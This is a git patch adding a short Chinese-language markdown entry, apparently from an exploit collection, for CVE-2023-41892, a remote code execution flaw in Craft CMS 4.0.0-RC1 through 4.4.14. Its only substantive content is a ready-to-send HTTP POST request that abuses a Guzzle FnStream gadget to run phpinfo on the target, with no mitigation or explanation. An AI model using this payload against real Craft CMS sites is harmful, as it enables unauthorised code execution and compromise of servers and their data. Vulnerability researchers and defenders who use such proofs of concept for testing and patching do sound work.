From 9714d96a1d605a27f0fd43cb39f914e6db52bb51 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Tue, 26 Sep 2023 12:45:55 +0800
Subject: [PATCH] =?UTF-8?q?Create=20Craft=20CMS=E8=BF=9C=E7=A8=8B=E4=BB=A3?=
 =?UTF-8?q?=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9ECVE-2023-41892.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 Craft CMS远程代码执行漏洞CVE-2023-41892.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 Craft CMS远程代码执行漏洞CVE-2023-41892.md

diff --git a/Craft CMS远程代码执行漏洞CVE-2023-41892.md b/Craft CMS远程代码执行漏洞CVE-2023-41892.md
new file mode 100644
index 0000000..fff12c3
--- /dev/null
+++ b/Craft CMS远程代码执行漏洞CVE-2023-41892.md	
@@ -0,0 +1,14 @@
+## Craft CMS远程代码执行漏洞CVE-2023-41892
+
+## 影响版本
+Craft CMS >= 4.0.0-RC1
+Craft CMS <= 4.4.14
+
+## exp
+```
+POST /index.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+
+action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
+```